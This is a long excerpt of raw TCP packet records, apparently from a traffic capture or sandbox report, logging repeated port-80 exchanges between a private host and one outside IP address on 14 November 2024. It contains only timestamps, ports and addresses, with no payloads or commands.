                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062588930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062598944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062608004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062633991 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062684059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062695026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062705040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062715054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062732935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062763929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062771082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062782049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062791109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062813044 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062825918 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062841892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062854052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062896013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.062907934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063069105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063080072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063090086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063100100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063110113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063118935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063126087 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063129902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063149929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063164949 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063172102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063182116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063190937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063200951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063222885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063242912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063359022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063369989 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063380003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063400984 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063494921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063505888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063517094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063535929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063568115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063944101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063956976 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063966990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.063992977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064138889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064150095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064158916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064188004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064210892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064213037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064224958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064265966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064284086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064294100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064302921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064312935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064327002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064347982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064588070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064599991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064609051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064635038 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064681053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064691067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064701080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064709902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064727068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.064760923 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.071273088 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075792074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075803995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075814962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075835943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075867891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075880051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.075962067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.076534986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.076548100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.076559067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.076636076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.076636076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.084374905 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.089010954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.089024067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.089032888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.089068890 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.089102030 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.117661953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.117691994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.117762089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129379034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129398108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129410028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129421949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129434109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129445076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129484892 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129484892 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.129484892 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.131628036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.131640911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.131652117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.131788015 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132234097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132308960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132318974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132329941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132345915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.132381916 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137851000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137902975 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137958050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137969017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137979984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.137991905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138004065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138014078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138031006 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138060093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138072968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138083935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138093948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.138127089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145126104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145137072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145149946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145174980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145183086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145184994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145195961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145205975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145214081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145215034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145227909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145237923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145263910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145263910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145263910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145278931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145289898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145298958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145308971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145319939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145328999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145339012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145349026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145374060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145374060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145374060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145406008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145411968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145422935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145431995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145452976 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145457983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145463943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145477057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145483971 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145488024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145498991 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145508051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145517111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145523071 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145526886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145540953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145545959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145551920 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145561934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145576000 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145576000 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145590067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145601988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145611048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145615101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145622015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145631075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145636082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145644903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145649910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145649910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145708084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145719051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145728111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145737886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145746946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145756960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145770073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145770073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145773888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145787001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145797014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145806074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145817041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145818949 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145818949 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145828962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145833969 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145839930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145850897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145859957 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145896912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145896912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.145896912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.146825075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.146836042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.146845102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.146903038 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.146903038 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162137985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162158012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162167072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162193060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162197113 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162203074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162213087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162240982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.162260056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180603027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180614948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180624008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180634975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180644035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180655003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180664062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180675030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180685043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180695057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180704117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180722952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180769920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180849075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180860043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180871964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180905104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180924892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180941105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180954933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180964947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180989981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180999994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.180999994 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181008101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181013107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181018114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181024075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181031942 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181052923 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181062937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181071997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181080103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181090117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181099892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181107044 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181135893 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181143045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181153059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181154966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181162119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181171894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181204081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181216955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181247950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181257010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181267023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181277037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181286097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181291103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181335926 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181680918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181700945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181716919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181729078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181737900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181742907 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181746960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181757927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181767941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181773901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181777954 CET8049958147.45.47.81192.168.2.10
